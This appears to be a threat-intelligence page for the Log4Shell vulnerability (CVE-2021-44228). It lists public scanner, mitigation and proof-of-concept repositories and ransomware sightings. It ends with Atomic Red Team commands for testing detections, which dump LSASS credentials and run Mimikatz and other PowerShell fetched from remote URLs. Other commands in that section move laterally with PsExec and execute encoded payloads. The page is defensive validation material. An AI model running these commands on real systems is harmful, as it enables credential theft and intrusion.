hozyx | 0 | 0 | 2021-12-16 | View |
|
andypitcher/Log4J_checker
Log4J checker for Apache CVE-2021-44228
|
andypitcher | 0 | 0 | 2021-12-16 | View |
|
Vulnmachines/log4j-cve-2021-44228
|
Vulnmachines | 0 | 0 | 2021-12-16 | View |
|
sysadmin0815/Fix-Log4j-PowershellScript
Log4Shell mitigation (CVE-2021-44228) - search and remove JNDI class from *log4j*.jar files on the system with Powershel...
|
sysadmin0815 | 0 | 0 | 2021-12-17 | View |
|
RenYuH/log4j-lookups-vulnerability
Log4j2 Vulnerability (CVE-2021-44228)
|
RenYuH | 0 | 0 | 2021-12-17 | View |
|
scheibling/py-log4shellscanner
Scanner for the Log4j vulnerability dubbed Log4Shell (CVE-2021-44228)
|
scheibling | 0 | 0 | 2021-12-17 | View |
|
zaneef/CVE-2021-44228
Log4Shell (CVE-2021-44228): Descrizione, Exploitation e Mitigazione
|
zaneef | 0 | 0 | 2021-12-17 | View |
|
metodidavidovic/log4j-quick-scan
Scan your IP network and determine hosts with possible CVE-2021-44228 vulnerability in log4j library.
|
metodidavidovic | 0 | 0 | 2021-12-17 | View |
|
WatchGuard-Threat-Lab/log4shell-iocs
A collection of IOCs for CVE-2021-44228 also known as Log4Shell
|
WatchGuard-Threat-Lab | 0 | 0 | 2021-12-17 | View |
|
m0rath/detect-log4j-exploitable
CVE-2021-44228
|
m0rath | 0 | 0 | 2021-12-17 | View |
|
DANSI/PowerShell-Log4J-Scanner
can find, analyse and patch Log4J files because of CVE-2021-44228, CVE-2021-45046
|
DANSI | 0 | 0 | 2021-12-18 | View |
|
suniastar/scan-log4shell
A scanning suite to find servers affected by the log4shell flaw (CVE-2021-44228) with example to test it
|
suniastar | 0 | 0 | 2021-12-18 | View |
|
shivakumarjayaraman/log4jvulnerability-CVE-2021-44228
An attempt to understand the log4j vulnerability by looking through the code
|
shivakumarjayaraman | 0 | 0 | 2021-12-18 | View |
|
otaviokr/log4j-2021-vulnerability-study
This is a showcase how the Log4J vulnerability (CVE-2021-44228) could be explored. This code is safe to run, but underst...
|
otaviokr | 0 | 0 | 2021-12-18 | View |
|
kkyehit/log4j_CVE-2021-44228
|
kkyehit | 0 | 0 | 2021-12-19 | View |
|
TotallyNotAHaxxer/f-for-java
a project written in go and java i abandoned for CVE-2021-44228 try to fix it if you can XD
|
TotallyNotAHaxxer | 0 | 0 | 2021-12-20 | View |
|
xx-zhang/apache-log4j2-CVE-2021-44228
相关的复现和文档
|
xx-zhang | 0 | 0 | 2021-12-21 | View |
|
r00thunter/Log4Shell-Scanner
Python script to detect Log4Shell Vulnerability CVE-2021-44228
|
r00thunter | 0 | 0 | 2021-12-21 | View |
|
rejupillai/log4j2-hack-springboot
Log4j2 CVE-2021-44228 hack demo for a springboot app
|
rejupillai | 0 | 0 | 2021-12-21 | View |
|
BJLIYANLIANG/log4j-scanner
Log4j 2 (CVE-2021-44228) vulnerability scanner for Windows OS
|
BJLIYANLIANG | 0 | 0 | 2021-12-22 | View |
|
grimch/log4j-CVE-2021-44228-workaround
general purpose workaround for the log4j CVE-2021-44228 vulnerability
|
grimch | 0 | 0 | 2021-12-24 | View |
|
Toolsec/log4j-scan
CVE-2021-44228 检查工具
|
Toolsec | 0 | 0 | 2021-12-24 | View |
|
bsigouin/log4shell-vulnerable-app
Spring Boot web application vulnerable to CVE-2021-44228, nicknamed Log4Shell.
|
bsigouin | 0 | 0 | 2021-12-24 | View |
|
j3kz/CVE-2021-44228-PoC
Self-contained lab environment that runs the exploit safely, all from docker compose
|
j3kz | 0 | 0 | 2021-12-18 | View |
|
Nikolas-Charalambidis/cve-2021-44228
A simple simulation of the infamous CVE-2021-44228 issue.
|
Nikolas-Charalambidis | 0 | 0 | 2021-12-17 | View |
|
snatalius/log4j2-CVE-2021-44228-poc-local
Just a personal proof of concept of CVE-2021-44228 on log4j2
|
snatalius | 0 | 0 | 2021-12-13 | View |
|
didoatanasov/cve-2021-44228
|
didoatanasov | 0 | 0 | 2021-12-14 | View |
|
wheezysec/CVE-2021-44228-kusto
|
wheezysec | 0 | 0 | 2021-12-10 | View |
|
roticagas/CVE-2021-44228-Demo
|
roticagas | 0 | 0 | 2021-12-14 | View |
|
bumheehan/cve-2021-44228-log4j-test
|
bumheehan | 0 | 0 | 2021-12-20 | View |
|
intel-xeon/CVE-2021-44228---detection-with-PowerShell
|
intel-xeon | 0 | 0 | 2021-12-20 | View |
|
rv4l3r3/log4v-vuln-check
This script is used to perform a fast check if your server is possibly affected by CVE-2021-44228 (the log4j vulnerabili...
|
rv4l3r3 | 0 | 0 | 2021-12-16 | View |
|
xungzzz/VTI-IOCs-CVE-2021-44228
IOCs for CVE-2021-44228
|
xungzzz | 0 | 0 | 2021-12-27 | View |
|
LinkMJB/log4shell_scanner
Quick and dirty scanner, hitting common ports looking for Log4Shell (CVE-2021-44228) vulnerability
|
LinkMJB | 0 | 0 | 2021-12-27 | View |
|
IAmNewbieZ/CVE-2021-44228
|
IAmNewbieZ | 0 | 0 | 2022-02-04 | View |
|
ToxicEnvelope/XSYS-Log4J2Shell-Ex
this repository contains a POC of CVE-2021-44228 (log4j2shell) as part of a security research
|
ToxicEnvelope | 0 | 0 | 2021-12-25 | View |
|
felipe8398/ModSec-log4j2
Regra ModSec para proteção log4j2 - CVE-2021-44228
|
felipe8398 | 0 | 0 | 2021-12-27 | View |
|
c3-h2/Log4j_Attacker_IPList
CVE-2021-44228
|
c3-h2 | 0 | 0 | 2021-12-27 | View |
|
mazhar-hassan/log4j-vulnerability
Log4Shell (CVE-2021-44228) is a zero-day vulnerability in Log4j
|
mazhar-hassan | 0 | 0 | 2021-12-27 | View |
|
s-retlaw/l4s_poc
Log4Shell (Cve-2021-44228) Proof Of Concept
|
s-retlaw | 0 | 0 | 2021-12-27 | View |
|
Ravid-CheckMarx/CVE-2021-44228-Apache-Log4j-Rce-main
|
Ravid-CheckMarx | 0 | 0 | 2021-12-27 | View |
|
uint0/cve-2021-44228-helpers
|
uint0 | 0 | 0 | 2021-12-12 | View |
|
jeremyrsellars/CVE-2021-44228_scanner
Aims to find JndiLookup.class in nearly any directory or zip, jar, ear, war file, even deeply nested.
|
jeremyrsellars | 0 | 0 | 2021-12-15 | View |
|
PoneyClairDeLune/LogJackFix
A spigot plugin to fix CVE-2021-44228 Log4j remote code execution vulnerability, to protect Minecraft clients.
|
PoneyClairDeLune | 0 | 0 | 2021-12-28 | View |
|
romanutti/log4shell-vulnerable-app
This repository contains a Spring Boot web application vulnerable to CVE-2021-44228, known as log4shell.
|
romanutti | 0 | 0 | 2021-12-31 | View |
|
mklinkj/log4j2-test
Log4j2 LDAP 취약점 테스트 (CVE-2021-44228)
|
mklinkj | 0 | 0 | 2022-01-03 | View |
|
alexpena5635/CVE-2021-44228_scanner-main-Modified-
|
alexpena5635 | 0 | 0 | 2022-01-05 | View |
|
s-retlaw/l4srs
Rust implementation of the Log 4 Shell (log 4 j - CVE-2021-44228)
|
s-retlaw | 0 | 0 | 2022-02-16 | View |
|
Willian-2-0-0-1/Log4j-Exploit-CVE-2021-44228
|
Willian-2-0-0-1 | 0 | 0 | 2022-05-02 | View |
|
Phineas09/CVE-2021-44228
Log4Shell Proof-Of-Concept derived from https://github.com/kozmer/log4j-shell-poc
|
Phineas09 | 0 | 0 | 2022-05-13 | View |
|
yuuki1967/CVE-2021-44228-Apache-Log4j-Rce
|
yuuki1967 | 0 | 0 | 2022-05-25 | View |
|
ra890927/Log4Shell-CVE-2021-44228-Demo
Log4Shell CVE-2021-44228 Demo
|
ra890927 | 0 | 0 | 2022-06-12 | View |
|
vino-theva/CVE-2021-44228
Apache Log4j is a logging tool written in Java. This paper focuses on what is Log4j and log4shell vulnerability and how...
|
vino-theva | 0 | 0 | 2022-08-02 | View |
|
tharindudh/tharindudh-Log4j-Vulnerability-in-Ghidra-tool-CVE-2021-44228
|
tharindudh | 0 | 0 | 2022-08-18 | View |
|
digital-dev/Log4j-CVE-2021-44228-Remediation
This powershell script is intended to be used by anyone looking to remediate the Log4j Vulnerability within their enviro...
|
digital-dev | 0 | 0 | 2022-09-08 | View |
|
ocastel/log4j-shell-poc
A Proof-Of-Concept for the CVE-2021-44228 vulnerability.
|
ocastel | 0 | 0 | 2022-09-21 | View |
|
Sumitpathania03/LOG4J-CVE-2021-44228
|
Sumitpathania03 | 0 | 0 | 2023-02-22 | View |
|
53buahapel/log4shell-vulnweb
this web is vulnerable against CVE-2021-44228
|
53buahapel | 0 | 0 | 2023-03-20 | View |
|
funcid/log4j-exploit-fork-bomb
💣💥💀 Proof of Concept: пример запуска fork-бомбы на удаленном сервере благодаря уязвимости CVE-2021-44228
|
funcid | 0 | 0 | 2023-04-15 | View |
|
Muhammad-Ali007/Log4j_CVE-2021-44228
|
Muhammad-Ali007 | 0 | 0 | 2023-07-19 | View |
|
roshanshibu/Odysseus
A demo of the Log4Shell (CVE-2021-44228) vulnerability.
|
roshanshibu | 0 | 0 | 2023-10-25 | View |
|
ShlomiRex/log4shell_lab
CVE-2021-44228
|
ShlomiRex | 0 | 0 | 2023-11-30 | View |
|
scabench/l4j-tp1
jee web project with log4shell (CVE-2021-44228) vulnerability
|
scabench | 0 | 0 | 2023-12-18 | View |
|
dbwlsdnr95/CVE-2021-44228
|
dbwlsdnr95 | 0 | 0 | 2025-12-20 | View |
|
scabench/l4j-fp1
jee web project with sanitised log4shell (CVE-2021-44228) vulnerability
|
scabench | 0 | 0 | 2023-12-27 | View |
|
KtokKawu/l4s-vulnapp
This is a potentially vulnerable Java web application containing Log4j affected by log4shell(CVE-2021-44228).
|
KtokKawu | 0 | 0 | 2024-03-15 | View |
|
YangHyperData/LOGJ4_PocShell_CVE-2021-44228
|
YangHyperData | 0 | 0 | 2024-04-02 | View |
|
NikitaPark/Log4Shell-PoC-Application
Log4Shell (CVE-2021-44228) PoC Application
|
NikitaPark | 0 | 0 | 2024-05-29 | View |
|
asd58584388/CVE-2021-44228
CVE-2021-44228 vulnerability study
|
asd58584388 | 0 | 0 | 2024-07-26 | View |
|
OtisSymbos/CVE-2021-44228-Log4Shell-
|
OtisSymbos | 0 | 0 | 2024-09-11 | View |
|
safeer-accuknox/log4j-shell-poc
Log4J exploit CVE-2021-44228
|
safeer-accuknox | 0 | 0 | 2024-09-11 | View |
|
AhmedMansour93/-Unveiling-the-Lessons-from-Log4Shell-A-Wake-Up-Call-for-Cybersecurity-
In December 2021, the world of cybersecurity was shaken by the discovery of the Log4Shell vulnerability (CVE-2021-44228)...
|
AhmedMansour93 | 0 | 0 | 2024-11-10 | View |
|
ZacharyZcR/CVE-2021-44228
调试环境
|
ZacharyZcR | 0 | 0 | 2025-01-20 | View |
|
yadavmukesh/Log4Shell-vulnerability-CVE-2021-44228-
This repository provides an in-depth analysis of the Log4Shell vulnerability (CVE-2021-44228) and implements a machine l...
|
yadavmukesh | 0 | 0 | 2025-02-17 | View |
|
tpdlshdmlrkfmcla/Log4shell
CVE-2021-44228
|
tpdlshdmlrkfmcla | 0 | 0 | 2025-03-12 | View |
|
timothyjxhn/DeliberatelyVulnerableWebApp
A Deliberately Vulnerable Web Application built on Struts 2 (CVE-2017-5638) and Log4J (CVE-2021-44228) for testing and d...
|
timothyjxhn | 0 | 0 | 2025-03-27 | View |
|
khaidtraivch/CVE-2021-44228-Log4Shell-
Kiểm thử xâm nhập
|
khaidtraivch | 0 | 0 | 2025-04-14 | View |
|
Fauzan-Aldi/Log4j-_Vulnerability
The Web Is Vulnerable to CVE-2021-44228
|
Fauzan-Aldi | 0 | 0 | 2025-05-08 | View |
|
SerpilRivas/log4shell-homework9
Log4Shell (CVE-2021-44228) exploit demo for SEAS 8405. Includes a vulnerable Spring Boot app, fake LDAP server, Docker s...
|
SerpilRivas | 0 | 0 | 2025-05-27 | View |
|
x1ongsec/CVE-2021-44228-Log4j-JNDI
CVE-2021-44228 Vulnerability Reproduction Environment CVE-2021-44228 漏洞复现环境
|
x1ongsec | 0 | 0 | 2025-06-21 | View |
|
fabioeletto/hka-seminar-log4shell
Praktische Demonstration der Log4Shell-Sicherheitslücke (CVE-2021-44228)
|
fabioeletto | 0 | 0 | 2025-07-10 | View |
|
cuijiung/log4j-CVE-2021-44228
|
cuijiung | 0 | 0 | 2025-07-11 | View |
|
Sorrence/CVE-2021-44228
A simple Log4j PoC written in Go
|
Sorrence | 0 | 0 | 2025-08-04 | View |
|
KamalideenAK/Microsoft-Defender-for-Endpoint-Deployment-on-Windows-10-11-device
This repository documents how deployment of Microsoft Defender for Endpoint on a Windows 11 device, including onboarding...
|
KamalideenAK | 0 | 0 | 2025-09-27 | View |
|
arabindadora/log4shell
Log4Shell (CVE-2021-44228) PoC
|
arabindadora | 0 | 0 | 2025-09-29 | View |
|
Mintimate/log4j2-bugmaker
Demo of CVE-2021-44228 Log4Shell.
|
Mintimate | 0 | 0 | 2025-10-28 | View |
|
mgueye3/Log4Shell
This repository contains my work for a cybersecurity assignment where I exploited the real-world Log4Shell (CVE-2021-442...
|
mgueye3 | 0 | 0 | 2025-11-16 | View |
|
PCMKUIT/CVE-2021-44228---Log4Shell-Analysis
Technical deep dive into Apache Log4j2 JNDI injection vulnerability. Features static code analysis, patch comparison, at...
|
PCMKUIT | 0 | 0 | 2025-11-18 | View |
|
DrHaitham/Log4Shell-CVE-2021-44228
Hands-on lab for exploiting and understanding Log4Shell (CVE-2021-44228) using Docker, Kali Linux, Burp Suite and log4j-...
|
DrHaitham | 0 | 0 | 2025-12-05 | View |
|
Loliverte/Log4j-Vulnerability
Étude technique et mise en œuvre d'un environnement de test pour la faille Apache Log4j (CVE-2021-44228). Contient un Pr...
|
Loliverte | 0 | 0 | 2025-12-14 | View |
|
JoseMariaMicoli/Log4Shell-PoC
**Log4Shell PoC is a high-fidelity exploitation environment designed to replicate the CVE-2021-44228 vulnerability.** It...
|
JoseMariaMicoli | 0 | 0 | 2026-01-14 | View |
|
agylabs/log4shell-remediation
Log4Shell (CVE-2021-44228) security remediation demo - Showcasing Antigravity's ability to identify and fix critical sec...
|
agylabs | 0 | 0 | 2026-02-05 | View |
|
0xBlackash/CVE-2021-44228
CVE-2021-44228
|
0xBlackash | 0 | 0 | 2026-02-26 | View |
|
Codepumpking/log4shell-poc
POC for log4shll Vulnerablity (CVE-2021-44228)
|
Codepumpking | 0 | 0 | 2026-03-15 | View |
|
wmohamed2033/wmohamed2033.github.io
CVE-2021-44228 Log4Shell — Penetration Test Writeup
|
wmohamed2033 | 0 | 0 | 2026-03-17 | View |
|
Saru1718/THM---Solar-exploiting-Log-4j
This room is based on exploiting the notorious Log4j vulnerability ( CVE-2021-44228), also referred to as the Log4Shell....
|
Saru1718 | 0 | 0 | 2026-03-22 | View |
|
Lavanya2085/solar-exploiting-log4j
This repository provides a detailed walkthrough of the *Solar Exploiting Log4j room* on TryHackMe, focusing on exploiti...
|
Lavanya2085 | 0 | 0 | 2026-03-22 | View |
|
Rainyseason-c/log4j2_CVE-2021-44228
|
Rainyseason-c | 0 | 0 | 2022-12-30 | View |
|
Alan-coder-eng/log4j-cve-2021-44228-
|
Alan-coder-eng | 0 | 0 | 2025-07-25 | View |
|
dbgee/CVE-2021-44228
Apache Log4j 2 a remote code execution vulnerability via the ldap JNDI parser.
|
dbgee | 0 | 0 | 2021-12-10 | View |
|
TheArqsz/CVE-2021-44228-PoC
|
TheArqsz | 0 | 0 | 2021-12-10 | View |
|
gauthamg/log4j2021_vul_test
Test the CVE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228
|
gauthamg | 0 | 0 | 2021-12-11 | View |
|
LemonCraftRu/JndiRemover
Небольшой мод направленный на устранение уязвимости CVE-2021-44228
|
LemonCraftRu | 0 | 0 | 2021-12-11 | View |
|
zhangxvx/Log4j-Rec-CVE-2021-44228
Apache Log4j CVE-2021-44228 漏洞复现
|
zhangxvx | 0 | 0 | 2021-12-11 | View |
|
creamIcec/CVE-2021-44228-Apache-Log4j-Rce__review
log4j2漏洞复现
|
creamIcec | 0 | 0 | 2021-12-12 | View |
|
Crane-Mocker/log4j-poc
Poc of log4j2 (CVE-2021-44228)
|
Crane-Mocker | 0 | 0 | 2021-12-12 | View |
|
urholaukkarinen/docker-log4shell
Dockerized Go app for testing the CVE-2021-44228 vulnerability
|
urholaukkarinen | 0 | 0 | 2021-12-12 | View |
|
lohanichaten/log4j-cve-2021-44228
|
lohanichaten | 0 | 0 | 2021-12-12 | View |
|
fireflyingup/log4j-poc
CVE-2021-44228 test demo
|
fireflyingup | 0 | 0 | 2021-12-12 | View |
|
maxant/log4j2-CVE-2021-44228
|
maxant | 0 | 0 | 2021-12-13 | View |
|
markuman/aws-log4j-mitigations
CVE-2021-44228 log4j mitigation using aws wafv2 with ansible
|
markuman | 0 | 0 | 2021-12-13 | View |
|
Camphul/log4shell-spring-framework-research
Research into the implications of CVE-2021-44228 in Spring based applications.
|
Camphul | 0 | 0 | 2021-12-13 | View |
|
racoon-rac/CVE-2021-44228
|
racoon-rac | 0 | 0 | 2021-12-10 | View |
|
datadavev/test-44228
Simple demo of CVE-2021-44228
|
datadavev | 0 | 0 | 2021-12-11 | View |
|
lov3r/cve-2021-44228-log4j-exploits
CVE-2021-4428 复现
|
lov3r | 0 | 0 | 2021-12-13 | View |
|
LutziGoz/Log4J_Exploitation-Vulnerabiliy__CVE-2021-44228
|
LutziGoz | 0 | 0 | 2021-12-13 | View |
|
1hakusai1/log4j-rce-CVE-2021-44228
log4j2 CVE-2021-44228 POC
|
1hakusai1 | 0 | 0 | 2021-12-13 | View |
|
VNYui/CVE-2021-44228
Mass recognition tool for CVE-2021-44228
|
VNYui | 0 | 0 | 2021-12-13 | View |
|
flxhaas/Scan-CVE-2021-44228
|
flxhaas | 0 | 0 | 2021-12-13 | View |
|
tobiasoed/log4j-CVE-2021-44228
|
tobiasoed | 0 | 0 | 2021-12-13 | View |
|
rodfer0x80/log4j2-prosecutor
CVE-2021-44228
|
rodfer0x80 | 0 | 0 | 2021-12-13 | View |
|
yanghaoi/CVE-2021-44228_Log4Shell
Log4Shell A test for CVE-2021-44228
|
yanghaoi | 0 | 0 | 2021-12-13 | View |
|
ben-smash/l4j-info
Compiling links of value i find regarding CVE-2021-44228
|
ben-smash | 0 | 0 | 2021-12-13 | View |
|
strawhatasif/log4j-test
Demonstration of CVE-2021-44228 with a possible strategic fix.
|
strawhatasif | 0 | 0 | 2021-12-13 | View |
|
tica506/Siem-queries-for-CVE-2021-44228
|
tica506 | 0 | 0 | 2021-12-13 | View |
|
cbuschka/log4j2-rce-recap
Little recap of the log4j2 remote code execution (CVE-2021-44228)
|
cbuschka | 0 | 0 | 2021-12-14 | View |
|
andrii-kovalenko-celonis/log4j-vulnerability-demo
Endpoint to test CVE-2021-44228 – Log4j 2
|
andrii-kovalenko-celonis | 0 | 0 | 2021-12-14 | View |
|
ShaneKingBlog/org.shaneking.demo.cve.y2021.s44228
CVE-2021-44228
|
ShaneKingBlog | 0 | 0 | 2021-12-14 | View |
Ransomware Groups 10
Threat Feed
52 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability (5 known victims)
Ransomware group known to exploit this vulnerability (2 known victims)
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability (2 known victims)
Ransomware group known to exploit this vulnerability (5 known victims)
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability (5 known victims)
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Public exploit code is available for this vulnerability
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Deployed role: Linux · Web Server
Kill chain derived from the ML classifier. Pick the target OS above to see the OS-specific path and matching playbook.
Attack Vectors ML
MITRE ATT&CK Techniques (10)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-586 | Object Injection |
48%
|
Medium | High |
Red Team Playbook
108 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
"#{procdump_exe}" -accepteula -mm lsass.exe #{output_file}
$exePath = resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
& "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe --silent-process-exit "#{output_folder}"
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe -w "%temp%\nanodump.dmp"
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
try{ IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1') -ErrorAction Stop}
catch{ $_; exit $_.Exception.Response.StatusCode.Value__}
get-process lsass | Out-Minidump
"#{procdump_exe}" -accepteula -ma lsass.exe #{output_file}
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
"#{dumpert_exe}"
#{xordump_exe} -out #{output_file} -x 0x41
if (Test-Path -Path "$env:SystemRoot\System32\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\System32\rdrleakdiag.exe"
} elseif (Test-Path -Path "$env:SystemRoot\SysWOW64\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\SysWOW64\rdrleakdiag.exe"
} else {
$binary_path = "File not found"
exit 1
}
$lsass_pid = get-process lsass |select -expand id
if (-not (Test-Path -Path"$env:TEMP\t1003.001-13-rdrleakdiag")) {New-Item -ItemType Directory -Path $env:TEMP\t1003.001-13-rdrleakdiag -Force}
write-host $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
& $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
Write-Host "Minidump file, minidump_$lsass_pid.dmp can be found inside $env:TEMP\t1003.001-13-rdrleakdiag directory."
"#{venv_path}\Scripts\pypykatz" live lsa
#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
"#{psexec_exe}" #{remote_host} -accepteula -c #{command_path}
cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1
New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
# this would not be part of a real attack but helpful for this simulation
function nslookup { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommand
powershell.exe -e #{obfuscated_code}
# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
$malcmdlets = #{Malicious_cmdlets}
foreach ($cmdlets in $malcmdlets) {
"function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
foreach ($cmdlets in $malcmdlets) {
$cmdlets}
New-PSSession -ComputerName #{hostname_to_connect}
Test-Connection $env:COMPUTERNAME
Set-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use -Value "T1086 PowerShell Session Creation and Use"
Get-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
Remove-Item -Force $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
